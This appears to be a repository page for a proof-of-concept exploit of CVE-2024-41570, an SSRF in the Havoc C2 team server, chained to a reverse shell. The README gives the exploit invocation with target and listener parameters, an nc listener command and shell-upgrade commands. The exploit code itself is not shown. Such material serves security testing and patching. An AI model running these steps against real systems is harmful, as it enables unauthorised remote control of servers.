CVE-2024-41570 PoC — Havoc Security Vulnerability

Associated Vulnerability
Title: Havoc Security Vulnerability (CVE-2024-41570)
Description: An Unauthenticated Server-Side Request Forgery (SSRF) in demon callback handling in Havoc 2 0.7 allows attackers to send arbitrary network traffic originating from the team server.
Description
Automated Reverse Shell Exploit via WebSocket | Havoc-C2-SSRF with RCE
Readme
# CVE-2024-41570 | Havoc C2 SSRF with RCE | Automated Reverse Shell Exploit via WebSocket

This project provides a Python-based proof-of-concept (PoC) script to exploit a vulnerable WebSocket-based service. The script automates agent registration, WebSocket payload delivery, and remote command execution to establish a reverse shell.

## Features
- Registers an agent to the target service.
- Opens a WebSocket and sends handshake and authentication payloads.
- Executes commands remotely via a reverse shell.
- Provides a guided workflow with clear instructions.

## Prerequisites
- Python 3.x installed on your machine.
- Install required dependencies by running:
  ```bash
  pip install -r requirements.txt
  ```

## Installation
1. Clone this repository:
   ```bash
   git clone https://github.com/kit4py/CVE-2024-41570.git
   ```
2. Navigate to the project directory:
   ```bash
   cd CVE-2024-41570
   ```
3. Install dependencies:
   ```bash
   pip install -r requirements.txt
   ```

## Usage
Run the script with the required arguments:

```bash
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
```

### Arguments
- `-t`: Target URL of the WebSocket server.
- `-i`: IP address of the Team Server from Havoc.
- `-p`: Port for the Team Server from Havoc.
- `-U`: Username for WebSocket authentication.
- `-P`: Password for WebSocket authentication.
- `-l`: Listener IP for the reverse shell (your machine).
- `-L`: Listener port for the reverse shell (your machine).

### Example Command
```bash
python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
```

### Steps to Execute
1. Ensure the target service is running and vulnerable.
2. Run the script with the required parameters.
3. In a separate terminal, start a listener:
   ```bash
   nc -lvnp <listener_port>
   ```
4. Upgrade shell:
   ```bash
   python -c 'import pty; pty.spawn("/bin/bash")'
   export TERM=xterm-256color
   stty rows 67 columns 318
   ```

## Dependencies
The script requires the following Python libraries:
- `requests`
- `pycryptodome`

Install them using the command:
```bash
pip install -r requirements.txt
```

## Security Notice
This script is intended for educational purposes only. Ensure you have explicit authorization to test the target system. Misuse of this script may violate laws and ethical guidelines.

## References
Inspired by [Default Havoc Poc](https://github.com/chebuya/Havoc-C2-SSRF-poc)

## Contributing
Contributions are welcome! Feel free to fork the repository and submit a pull request.

## License
This project is licensed under the MIT License. See the LICENSE file for details.
